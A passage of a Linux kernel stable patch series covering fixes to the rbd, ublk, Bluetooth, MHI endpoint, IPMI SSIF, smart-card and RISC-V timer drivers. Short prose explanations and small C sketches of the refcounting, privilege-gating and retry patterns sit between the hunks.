+ 		goto out_err;
+@@ -6746,8 +6744,8 @@ static int rbd_dev_probe_parent(struct rbd_device *rbd_dev, int depth)
+ 	 * Images related by parent/child relationships always share
+ 	 * rbd_client and spec/parent_spec, so bump their refcounts.
+ 	 */
+-	__rbd_get_client(rbd_dev->rbd_client);
+-	rbd_spec_get(rbd_dev->parent_spec);
++	parent->rbd_client = __rbd_get_client(rbd_dev->rbd_client);
++	parent->spec = rbd_spec_get(rbd_dev->parent_spec);
+ 
+ 	__set_bit(RBD_DEV_FLAG_READONLY, &parent->flags);
+ 
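
The rbd fix is about constructor ordering: __rbd_dev_create() no longer stores the client and spec, and rbd_dev_create() assigns all three refcounted fields only after the last failure point, so the release callback can never drop references the constructor has not yet taken. A generic sketch of the pattern with a hypothetical refcounted dependency:

#include <stdio.h>
#include <stdlib.h>

struct res {
	int refs;
};

static void res_get(struct res *r) { r->refs++; }
static void res_put(struct res *r) { r->refs--; }

struct obj {
	struct res *dep;
};

/* The release path blindly drops obj->dep if set. */
static void release(struct obj *o)
{
	if (o->dep)
		res_put(o->dep);
	free(o);
}

static struct obj *create(struct res *dep, int simulate_failure)
{
	struct obj *o = calloc(1, sizeof(*o));

	if (!o)
		return NULL;
	if (simulate_failure) {
		release(o);	/* safe: o->dep is still NULL */
		return NULL;
	}
	res_get(dep);		/* take references after the last failure point... */
	o->dep = dep;		/* ...and publish them together */
	return o;
}

int main(void)
{
	struct res dep = { .refs = 1 };
	struct obj *o = create(&dep, 0);

	if (o)
		release(o);
	if (!create(&dep, 1))
		printf("refs after failed create: %d\n", dep.refs);	/* still 1 */
	return 0;
}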
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 6368b56eacf11..4aec9be0ab77e 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -159,7 +159,7 @@ struct ublk_device {
+ 
+ 	struct completion	completion;
+ 	unsigned int		nr_queues_ready;
+-	atomic_t		nr_aborted_queues;
++	unsigned int		nr_privileged_daemon;
+ 
+ 	/*
+ 	 * Our ubq->daemon may be killed without any notification, so
+@@ -1179,6 +1179,9 @@ static void ublk_mark_io_ready(struct ublk_device *ub, struct ublk_queue *ubq)
+ 		ubq->ubq_daemon = current;
+ 		get_task_struct(ubq->ubq_daemon);
+ 		ub->nr_queues_ready++;
++
++		if (capable(CAP_SYS_ADMIN))
++			ub->nr_privileged_daemon++;
+ 	}
+ 	if (ub->nr_queues_ready == ub->dev_info.nr_hw_queues)
+ 		complete_all(&ub->completion);
+@@ -1203,6 +1206,7 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	u32 cmd_op = cmd->cmd_op;
+ 	unsigned tag = ub_cmd->tag;
+ 	int ret = -EINVAL;
++	struct request *req;
+ 
+ 	pr_devel("%s: received: cmd op %d queue %d tag %d result %d\n",
+ 			__func__, cmd->cmd_op, ub_cmd->q_id, tag,
+@@ -1253,8 +1257,8 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 		 */
+ 		if (io->flags & UBLK_IO_FLAG_OWNED_BY_SRV)
+ 			goto out;
+-		/* FETCH_RQ has to provide IO buffer */
+-		if (!ub_cmd->addr)
++		/* FETCH_RQ has to provide IO buffer if NEED GET DATA is not enabled */
++		if (!ub_cmd->addr && !ublk_need_get_data(ubq))
+ 			goto out;
+ 		io->cmd = cmd;
+ 		io->flags |= UBLK_IO_FLAG_ACTIVE;
+@@ -1263,8 +1267,12 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 		ublk_mark_io_ready(ub, ubq);
+ 		break;
+ 	case UBLK_IO_COMMIT_AND_FETCH_REQ:
+-		/* FETCH_RQ has to provide IO buffer */
+-		if (!ub_cmd->addr)
++		req = blk_mq_tag_to_rq(ub->tag_set.tags[ub_cmd->q_id], tag);
++		/*
++		 * COMMIT_AND_FETCH_REQ has to provide IO buffer if NEED GET DATA is
++		 * not enabled or if it is a Read IO.
++		 */
++		if (!ub_cmd->addr && (!ublk_need_get_data(ubq) || req_op(req) == REQ_OP_READ))
+ 			goto out;
+ 		if (!(io->flags & UBLK_IO_FLAG_OWNED_BY_SRV))
+ 			goto out;
+@@ -1535,6 +1543,10 @@ static int ublk_ctrl_start_dev(struct io_uring_cmd *cmd)
+ 	if (ret)
+ 		goto out_put_disk;
+ 
++	/* don't probe partitions if any one ubq daemon is untrusted */
++	if (ub->nr_privileged_daemon != ub->nr_queues_ready)
++		set_bit(GD_SUPPRESS_PART_SCAN, &disk->state);
++
+ 	get_device(&ub->cdev_dev);
+ 	ret = add_disk(disk);
+ 	if (ret) {
+@@ -1936,6 +1948,7 @@ static int ublk_ctrl_start_recovery(struct io_uring_cmd *cmd)
+ 	/* set to NULL, otherwise new ubq_daemon cannot mmap the io_cmd_buf */
+ 	ub->mm = NULL;
+ 	ub->nr_queues_ready = 0;
++	ub->nr_privileged_daemon = 0;
+ 	init_completion(&ub->completion);
+ 	ret = 0;
+  out_unlock:
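
The ublk change counts, next to nr_queues_ready, how many queue daemons held CAP_SYS_ADMIN when they registered, and suppresses the partition scan unless every daemon was privileged. A sketch of that gate with hypothetical helpers:

#include <stdbool.h>
#include <stdio.h>

struct dev_state {
	unsigned int nr_queues_ready;
	unsigned int nr_privileged_daemon;
};

static void mark_ready(struct dev_state *ub, bool privileged)
{
	ub->nr_queues_ready++;
	if (privileged)
		ub->nr_privileged_daemon++;
}

/* Scan partitions only when every ready daemon was privileged. */
static bool allow_part_scan(const struct dev_state *ub)
{
	return ub->nr_privileged_daemon == ub->nr_queues_ready;
}

int main(void)
{
	struct dev_state ub = { 0 };

	mark_ready(&ub, true);
	mark_ready(&ub, false);		/* one untrusted daemon taints the device */
	printf("partition scan allowed: %s\n", allow_part_scan(&ub) ? "yes" : "no");
	return 0;
}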
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 93e9ae928e4e8..952dc9d2404ed 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -63,6 +63,7 @@ static struct usb_driver btusb_driver;
+ #define BTUSB_INTEL_BROKEN_SHUTDOWN_LED	BIT(24)
+ #define BTUSB_INTEL_BROKEN_INITIAL_NCMD BIT(25)
+ #define BTUSB_INTEL_NO_WBS_SUPPORT	BIT(26)
++#define BTUSB_ACTIONS_SEMI		BIT(27)
+ 
+ static const struct usb_device_id btusb_table[] = {
+ 	/* Generic Bluetooth USB device */
+@@ -491,6 +492,10 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_VENDOR_AND_INTERFACE_INFO(0x8087, 0xe0, 0x01, 0x01),
+ 	  .driver_info = BTUSB_IGNORE },
+ 
++	/* Realtek 8821CE Bluetooth devices */
++	{ USB_DEVICE(0x13d3, 0x3529), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++
+ 	/* Realtek 8822CE Bluetooth devices */
+ 	{ USB_DEVICE(0x0bda, 0xb00c), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+@@ -557,6 +562,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0489, 0xe0e0), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0f2), .driver_info = BTUSB_MEDIATEK |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
+ 	{ USB_DEVICE(0x04ca, 0x3802), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
+@@ -663,6 +671,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0cb5, 0xc547), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+ 
++	/* Actions Semiconductor ATS2851 based devices */
++	{ USB_DEVICE(0x10d7, 0xb012), .driver_info = BTUSB_ACTIONS_SEMI },
++
+ 	/* Silicon Wave based devices */
+ 	{ USB_DEVICE(0x0c10, 0x0000), .driver_info = BTUSB_SWAVE },
+ 
+@@ -4012,6 +4023,11 @@ static int btusb_probe(struct usb_interface *intf,
+ 		set_bit(BTUSB_USE_ALT3_FOR_WBS, &data->flags);
+ 	}
+ 
++	if (id->driver_info & BTUSB_ACTIONS_SEMI) {
++		/* Support is advertised, but not implemented */
++		set_bit(HCI_QUIRK_BROKEN_ERR_DATA_REPORTING, &hdev->quirks);
++	}
++
+ 	if (!reset)
+ 		set_bit(HCI_QUIRK_RESET_ON_CLOSE, &hdev->quirks);
+ 
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index e4398590b0edc..7b9fd5f104335 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1582,10 +1582,11 @@ static bool qca_wakeup(struct hci_dev *hdev)
+ 	struct hci_uart *hu = hci_get_drvdata(hdev);
+ 	bool wakeup;
+ 
+-	/* UART driver handles the interrupt from BT SoC.So we need to use
+-	 * device handle of UART driver to get the status of device may wakeup.
++	/* BT SoC attached through the serial bus is handled by the serdev driver.
++	 * So we need to use the device handle of the serdev driver to check
++	 * whether the device may wake up.
+ 	 */
+-	wakeup = device_may_wakeup(hu->serdev->ctrl->dev.parent);
++	wakeup = device_may_wakeup(&hu->serdev->ctrl->dev);
+ 	bt_dev_dbg(hu->hdev, "wakeup status : %d", wakeup);
+ 
+ 	return wakeup;
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 1dc8a3557a464..9c42886818418 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -196,9 +196,11 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mhi_ep_mmio_disable_chdb(mhi_cntrl, ch_id);
+ 
+ 		/* Send channel disconnect status to client drivers */
+-		result.transaction_status = -ENOTCONN;
+-		result.bytes_xferd = 0;
+-		mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		if (mhi_chan->xfer_cb) {
++			result.transaction_status = -ENOTCONN;
++			result.bytes_xferd = 0;
++			mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		}
+ 
+ 		/* Set channel state to STOP */
+ 		mhi_chan->state = MHI_CH_STATE_STOP;
+@@ -228,9 +230,11 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mhi_ep_ring_reset(mhi_cntrl, ch_ring);
+ 
+ 		/* Send channel disconnect status to client driver */
+-		result.transaction_status = -ENOTCONN;
+-		result.bytes_xferd = 0;
+-		mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		if (mhi_chan->xfer_cb) {
++			result.transaction_status = -ENOTCONN;
++			result.bytes_xferd = 0;
++			mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		}
+ 
+ 		/* Set channel state to DISABLED */
+ 		mhi_chan->state = MHI_CH_STATE_DISABLED;
+@@ -719,24 +723,37 @@ static void mhi_ep_ch_ring_worker(struct work_struct *work)
+ 		list_del(&itr->node);
+ 		ring = itr->ring;
+ 
++		chan = &mhi_cntrl->mhi_chan[ring->ch_id];
++		mutex_lock(&chan->lock);
++
++		/*
++		 * The ring could've stopped while we waited to grab chan->lock, so do
++		 * a sanity check before going further.
++		 */
++		if (!ring->started) {
++			mutex_unlock(&chan->lock);
++			kfree(itr);
++			continue;
++		}
++
+ 		/* Update the write offset for the ring */
+ 		ret = mhi_ep_update_wr_offset(ring);
+ 		if (ret) {
+ 			dev_err(dev, "Error updating write offset for ring\n");
++			mutex_unlock(&chan->lock);
+ 			kfree(itr);
+ 			continue;
+ 		}
+ 
+ 		/* Sanity check to make sure there are elements in the ring */
+ 		if (ring->rd_offset == ring->wr_offset) {
++			mutex_unlock(&chan->lock);
+ 			kfree(itr);
+ 			continue;
+ 		}
+ 
+ 		el = &ring->ring_cache[ring->rd_offset];
+-		chan = &mhi_cntrl->mhi_chan[ring->ch_id];
+ 
+-		mutex_lock(&chan->lock);
+ 		dev_dbg(dev, "Processing the ring for channel (%u)\n", ring->ch_id);
+ 		ret = mhi_ep_process_ch_ring(ring, el);
+ 		if (ret) {
+@@ -1119,6 +1136,7 @@ void mhi_ep_suspend_channels(struct mhi_ep_cntrl *mhi_cntrl)
+ 
+ 		dev_dbg(&mhi_chan->mhi_dev->dev, "Suspending channel\n");
+ 		/* Set channel state to SUSPENDED */
++		mhi_chan->state = MHI_CH_STATE_SUSPENDED;
+ 		tmp &= ~CHAN_CTX_CHSTATE_MASK;
+ 		tmp |= FIELD_PREP(CHAN_CTX_CHSTATE_MASK, MHI_CH_STATE_SUSPENDED);
+ 		mhi_cntrl->ch_ctx_cache[i].chcfg = cpu_to_le32(tmp);
+@@ -1148,6 +1166,7 @@ void mhi_ep_resume_channels(struct mhi_ep_cntrl *mhi_cntrl)
+ 
+ 		dev_dbg(&mhi_chan->mhi_dev->dev, "Resuming channel\n");
+ 		/* Set channel state to RUNNING */
++		mhi_chan->state = MHI_CH_STATE_RUNNING;
+ 		tmp &= ~CHAN_CTX_CHSTATE_MASK;
+ 		tmp |= FIELD_PREP(CHAN_CTX_CHSTATE_MASK, MHI_CH_STATE_RUNNING);
+ 		mhi_cntrl->ch_ctx_cache[i].chcfg = cpu_to_le32(tmp);
+diff --git a/drivers/char/applicom.c b/drivers/char/applicom.c
+index 36203d3fa6ea6..69314532f38cd 100644
+--- a/drivers/char/applicom.c
++++ b/drivers/char/applicom.c
+@@ -197,8 +197,10 @@ static int __init applicom_init(void)
+ 		if (!pci_match_id(applicom_pci_tbl, dev))
+ 			continue;
+ 		
+-		if (pci_enable_device(dev))
++		if (pci_enable_device(dev)) {
++			pci_dev_put(dev);
+ 			return -EIO;
++		}
+ 
+ 		RamIO = ioremap(pci_resource_start(dev, 0), LEN_RAM_IO);
+ 
+@@ -207,6 +209,7 @@ static int __init applicom_init(void)
+ 				"space at 0x%llx\n",
+ 				(unsigned long long)pci_resource_start(dev, 0));
+ 			pci_disable_device(dev);
++			pci_dev_put(dev);
+ 			return -EIO;
+ 		}
+ 
+diff --git a/drivers/char/ipmi/ipmi_ipmb.c b/drivers/char/ipmi/ipmi_ipmb.c
+index 7c1aee5e11b77..3f1c9f1573e78 100644
+--- a/drivers/char/ipmi/ipmi_ipmb.c
++++ b/drivers/char/ipmi/ipmi_ipmb.c
+@@ -27,7 +27,7 @@ MODULE_PARM_DESC(bmcaddr, "Address to use for BMC.");
+ 
+ static unsigned int retry_time_ms = 250;
+ module_param(retry_time_ms, uint, 0644);
+-MODULE_PARM_DESC(max_retries, "Timeout time between retries, in milliseconds.");
++MODULE_PARM_DESC(retry_time_ms, "Timeout time between retries, in milliseconds.");
+ 
+ static unsigned int max_retries = 1;
+ module_param(max_retries, uint, 0644);
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index e1072809fe318..7c606c49cd535 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -92,7 +92,7 @@
+ #define SSIF_WATCH_WATCHDOG_TIMEOUT	msecs_to_jiffies(250)
+ 
+ enum ssif_intf_state {
+-	SSIF_NORMAL,
++	SSIF_IDLE,
+ 	SSIF_GETTING_FLAGS,
+ 	SSIF_GETTING_EVENTS,
+ 	SSIF_CLEARING_FLAGS,
+@@ -100,8 +100,8 @@ enum ssif_intf_state {
+ 	/* FIXME - add watchdog stuff. */
+ };
+ 
+-#define SSIF_IDLE(ssif)	 ((ssif)->ssif_state == SSIF_NORMAL \
+-			  && (ssif)->curr_msg == NULL)
++#define IS_SSIF_IDLE(ssif) ((ssif)->ssif_state == SSIF_IDLE \
++			    && (ssif)->curr_msg == NULL)
+ 
+ /*
+  * Indexes into stats[] in ssif_info below.
+@@ -348,9 +348,9 @@ static void return_hosed_msg(struct ssif_info *ssif_info,
+ 
+ /*
+  * Must be called with the message lock held.  This will release the
+- * message lock.  Note that the caller will check SSIF_IDLE and start a
+- * new operation, so there is no need to check for new messages to
+- * start in here.
++ * message lock.  Note that the caller will check IS_SSIF_IDLE and
++ * start a new operation, so there is no need to check for new
++ * messages to start in here.
+  */
+ static void start_clear_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ {
+@@ -367,7 +367,7 @@ static void start_clear_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ 
+ 	if (start_send(ssif_info, msg, 3) != 0) {
+ 		/* Error, just go to normal state. */
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 	}
+ }
+ 
+@@ -382,7 +382,7 @@ static void start_flag_fetch(struct ssif_info *ssif_info, unsigned long *flags)
+ 	mb[0] = (IPMI_NETFN_APP_REQUEST << 2);
+ 	mb[1] = IPMI_GET_MSG_FLAGS_CMD;
+ 	if (start_send(ssif_info, mb, 2) != 0)
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ }
+ 
+ static void check_start_send(struct ssif_info *ssif_info, unsigned long *flags,
+@@ -393,7 +393,7 @@ static void check_start_send(struct ssif_info *ssif_info, unsigned long *flags,
+ 
+ 		flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
+ 		ssif_info->curr_msg = NULL;
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		ipmi_free_smi_msg(msg);
+ 	}
+@@ -407,7 +407,7 @@ static void start_event_fetch(struct ssif_info *ssif_info, unsigned long *flags)
+ 
+ 	msg = ipmi_alloc_smi_msg();
+ 	if (!msg) {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -430,7 +430,7 @@ static void start_recv_msg_fetch(struct ssif_info *ssif_info,
+ 
+ 	msg = ipmi_alloc_smi_msg();
+ 	if (!msg) {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -448,9 +448,9 @@ static void start_recv_msg_fetch(struct ssif_info *ssif_info,
+ 
+ /*
+  * Must be called with the message lock held.  This will release the
+- * message lock.  Note that the caller will check SSIF_IDLE and start a
+- * new operation, so there is no need to check for new messages to
+- * start in here.
++ * message lock.  Note that the caller will check IS_SSIF_IDLE and
++ * start a new operation, so there is no need to check for new
++ * messages to start in here.
+  */
+ static void handle_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ {
+@@ -466,7 +466,7 @@ static void handle_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ 		/* Events available. */
+ 		start_event_fetch(ssif_info, flags);
+ 	else {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 	}
+ }
+@@ -568,7 +568,7 @@ static void watch_timeout(struct timer_list *t)
+ 	if (ssif_info->watch_timeout) {
+ 		mod_timer(&ssif_info->watch_timer,
+ 			  jiffies + ssif_info->watch_timeout);
+-		if (SSIF_IDLE(ssif_info)) {
++		if (IS_SSIF_IDLE(ssif_info)) {
+ 			start_flag_fetch(ssif_info, flags); /* Releases lock */
+ 			return;
+ 		}
+@@ -602,7 +602,7 @@ static void ssif_alert(struct i2c_client *client, enum i2c_alert_protocol type,
+ 		start_get(ssif_info);
+ }
+ 
+-static int start_resend(struct ssif_info *ssif_info);
++static void start_resend(struct ssif_info *ssif_info);
+ 
+ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 			     unsigned char *data, unsigned int len)
+@@ -756,7 +756,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ 
+ 	switch (ssif_info->ssif_state) {
+-	case SSIF_NORMAL:
++	case SSIF_IDLE:
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		if (!msg)
+ 			break;
+@@ -774,7 +774,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 			 * Error fetching flags, or invalid length,
+ 			 * just give up for now.
+ 			 */
+-			ssif_info->ssif_state = SSIF_NORMAL;
++			ssif_info->ssif_state = SSIF_IDLE;
+ 			ipmi_ssif_unlock_cond(ssif_info, flags);
+ 			dev_warn(&ssif_info->client->dev,
+ 				 "Error getting flags: %d %d, %x\n",
+@@ -809,7 +809,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 				 "Invalid response clearing flags: %x %x\n",
+ 				 data[0], data[1]);
+ 		}
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		break;
+ 
+@@ -887,7 +887,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ 
+ 	flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
+-	if (SSIF_IDLE(ssif_info) && !ssif_info->stopping) {
++	if (IS_SSIF_IDLE(ssif_info) && !ssif_info->stopping) {
+ 		if (ssif_info->req_events)
+ 			start_event_fetch(ssif_info, flags);
+ 		else if (ssif_info->req_flags)
+@@ -909,31 +909,17 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 	if (result < 0) {
+ 		ssif_info->retries_left--;
+ 		if (ssif_info->retries_left > 0) {
+-			if (!start_resend(ssif_info)) {
+-				ssif_inc_stat(ssif_info, send_retries);
+-				return;
+-			}
+-			/* request failed, just return the error. */
+-			ssif_inc_stat(ssif_info, send_errors);
+-
+-			if (ssif_info->ssif_debug & SSIF_DEBUG_MSG)
+-				dev_dbg(&ssif_info->client->dev,
+-					"%s: Out of retries\n", __func__);
+-			msg_done_handler(ssif_info, -EIO, NULL, 0);
++			start_resend(ssif_info);
+ 			return;
+ 		}
+ 
+ 		ssif_inc_stat(ssif_info, send_errors);
+ 
+-		/*
+-		 * Got an error on transmit, let the done routine
+-		 * handle it.
+-		 */
+ 		if (ssif_info->ssif_debug & SSIF_DEBUG_MSG)
+ 			dev_dbg(&ssif_info->client->dev,
+-				"%s: Error  %d\n", __func__, result);
++				"%s: Out of retries\n", __func__);
+ 
+-		msg_done_handler(ssif_info, result, NULL, 0);
++		msg_done_handler(ssif_info, -EIO, NULL, 0);
+ 		return;
+ 	}
+ 
+@@ -996,7 +982,7 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ }
+ 
+-static int start_resend(struct ssif_info *ssif_info)
++static void start_resend(struct ssif_info *ssif_info)
+ {
+ 	int command;
+ 
+@@ -1021,7 +1007,6 @@ static int start_resend(struct ssif_info *ssif_info)
+ 
+ 	ssif_i2c_send(ssif_info, msg_written_handler, I2C_SMBUS_WRITE,
+ 		   command, ssif_info->data, I2C_SMBUS_BLOCK_DATA);
+-	return 0;
+ }
+ 
+ static int start_send(struct ssif_info *ssif_info,
+@@ -1036,7 +1021,8 @@ static int start_send(struct ssif_info *ssif_info,
+ 	ssif_info->retries_left = SSIF_SEND_RETRIES;
+ 	memcpy(ssif_info->data + 1, data, len);
+ 	ssif_info->data_len = len;
+-	return start_resend(ssif_info);
++	start_resend(ssif_info);
++	return 0;
+ }
+ 
+ /* Must be called with the message lock held. */
+@@ -1046,7 +1032,7 @@ static void start_next_msg(struct ssif_info *ssif_info, unsigned long *flags)
+ 	unsigned long oflags;
+ 
+  restart:
+-	if (!SSIF_IDLE(ssif_info)) {
++	if (!IS_SSIF_IDLE(ssif_info)) {
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -1269,7 +1255,7 @@ static void shutdown_ssif(void *send_info)
+ 	dev_set_drvdata(&ssif_info->client->dev, NULL);
+ 
+ 	/* make sure the driver is not looking for flags any more. */
+-	while (ssif_info->ssif_state != SSIF_NORMAL)
++	while (ssif_info->ssif_state != SSIF_IDLE)
+ 		schedule_timeout(1);
+ 
+ 	ssif_info->stopping = true;
+@@ -1839,7 +1825,7 @@ static int ssif_probe(struct i2c_client *client)
+ 	}
+ 
+ 	spin_lock_init(&ssif_info->lock);
+-	ssif_info->ssif_state = SSIF_NORMAL;
++	ssif_info->ssif_state = SSIF_IDLE;
+ 	timer_setup(&ssif_info->retry_timer, retry_timeout, 0);
+ 	timer_setup(&ssif_info->watch_timer, watch_timeout, 0);
+ 
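
With start_resend() made void, msg_written_handler() above is the one place that accounts retries: every transmit error consumes one retry and re-issues the send, and only an exhausted budget completes the message with -EIO. A compact userspace sketch of that loop; the failing transmit() is simulated:

#include <errno.h>
#include <stdio.h>

#define SSIF_SEND_RETRIES 3

static int attempts;

/* Simulated bus: fail twice, then succeed. */
static int transmit(void)
{
	return ++attempts < 3 ? -EIO : 0;
}

static int send_with_retries(void)
{
	int retries_left = SSIF_SEND_RETRIES;

	for (;;) {
		int result = transmit();

		if (result >= 0)
			return 0;	/* written; the reply is handled elsewhere */
		if (--retries_left > 0)
			continue;	/* the start_resend() step: just retry */
		return -EIO;		/* out of retries: fail the message */
	}
}

int main(void)
{
	int ret = send_with_retries();

	printf("send -> %d after %d attempt(s)\n", ret, attempts);
	return 0;
}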
+diff --git a/drivers/char/pcmcia/cm4000_cs.c b/drivers/char/pcmcia/cm4000_cs.c
+index adaec8fd4b16c..e656f42a28ac2 100644
+--- a/drivers/char/pcmcia/cm4000_cs.c
++++ b/drivers/char/pcmcia/cm4000_cs.c
+@@ -529,7 +529,8 @@ static int set_protocol(struct cm4000_dev *dev, struct ptsreq *ptsreq)
+ 			DEBUGP(5, dev, "NumRecBytes is valid\n");
+ 			break;
+ 		}
+-		usleep_range(10000, 11000);
++		/* cannot sleep as this is in atomic context */
++		mdelay(10);
+ 	}
+ 	if (i == 100) {
+ 		DEBUGP(5, dev, "Timeout waiting for NumRecBytes getting "
+@@ -549,7 +550,8 @@ static int set_protocol(struct cm4000_dev *dev, struct ptsreq *ptsreq)
+ 			}
+ 			break;
+ 		}
+-		usleep_range(10000, 11000);
++		/* cannot sleep as this is in atomic context */
++		mdelay(10);
+ 	}
+ 
+ 	/* check whether it is a short PTS reply? */
+diff --git a/drivers/clocksource/timer-riscv.c b/drivers/clocksource/timer-riscv.c
+index a0d66fabf0732..a01c2bd241349 100644
+--- a/drivers/clocksource/timer-riscv.c
++++ b/drivers/clocksource/timer-riscv.c
+@@ -177,6 +177,11 @@ static int __init riscv_timer_init_dt(struct device_node *n)
+ 		return error;
+ 	}
+ 
++	if (riscv_isa_extension_available(NULL, SSTC)) {
++		pr_info("Timer interrupt in S-mode is available via sstc extension\n");
++		static_branch_enable(&riscv_sstc_available);
++	}
++
+ 	error = cpuhp_setup_state(CPUHP_AP_RISCV_TIMER_STARTING,
+ 			 "clockevents/riscv/timer:starting",
+ 			 riscv_timer_starting_cpu, riscv_timer_dying_cpu);
+@@ -184,11 +189,6 @@ static int __init riscv_timer_init_dt(struct device_node *n)
+ 		pr_err("cpu hp setup state failed for RISCV timer [%d]\n",
+ 		       error);
+ 
+-	if (riscv_isa_extension_available(NULL, SSTC)) {
+-		pr_info("Timer interrupt in S-mode is available via sstc extension\n");
+-		static_branch_enable(&riscv_sstc_available);
+-	}
+-
+ 	return error;
+ }
+ 
+diff --git a/drivers/cpufreq/davinci-cpufreq.c b/drivers/cpufreq/davinci-cpufreq.c
+index 9e97f60f81996..ebb3a81026816 100644
+--- a/drivers/cpufreq/davinci-cpufreq.c
++++ b/drivers/cpufreq/davinci-cpufreq.c
+@@ -133,12 +133,14 @@ static int __init davinci_cpufreq_probe(struct platform_device *pdev)
+ 
+ static int __exit davinci_cpufreq_remove(struct platform_device *pdev)
+ {
++	cpufreq_unregister_driver(&davinci_driver);
++
+ 	clk_put(cpufreq.armclk);
+ 
+ 	if (cpufreq.asyncclk)
+ 		clk_put(cpufreq.asyncclk);
+ 
+-	return cpufreq_unregister_driver(&davinci_driver);
++	return 0;
+ }
+ 
+ static struct platform_driver davinci_cpufreq_driver = {
+diff --git a/drivers/cpuidle/Kconfig.arm b/drivers/cpuidle/Kconfig.arm
+index 747aa537389b9..f0714a32921e6 100644
+--- a/drivers/cpuidle/Kconfig.arm
++++ b/drivers/cpuidle/Kconfig.arm
+@@ -102,6 +102,7 @@ config ARM_MVEBU_V7_CPUIDLE
+ config ARM_TEGRA_CPUIDLE
+ 	bool "CPU Idle Driver for NVIDIA Tegra SoCs"
+ 	depends on (ARCH_TEGRA || COMPILE_TEST) && !ARM64 && MMU
++	depends on ARCH_SUSPEND_POSSIBLE
+ 	select ARCH_NEEDS_CPU_IDLE_COUPLED if SMP
+ 	select ARM_CPU_SUSPEND
+ 	help
+@@ -110,6 +111,7 @@ config ARM_TEGRA_CPUIDLE
+ config ARM_QCOM_SPM_CPUIDLE
+ 	bool "CPU Idle Driver for Qualcomm Subsystem Power Manager (SPM)"
+ 	depends on (ARCH_QCOM || COMPILE_TEST) && !ARM64 && MMU
++	depends on ARCH_SUSPEND_POSSIBLE
+ 	select ARM_CPU_SUSPEND
+ 	select CPU_IDLE_MULTIPLE_DRIVERS
+ 	select DT_IDLE_STATES
+diff --git a/drivers/crypto/amcc/crypto4xx_core.c b/drivers/crypto/amcc/crypto4xx_core.c
+index 280f4b0e71334..50dc783821b69 100644
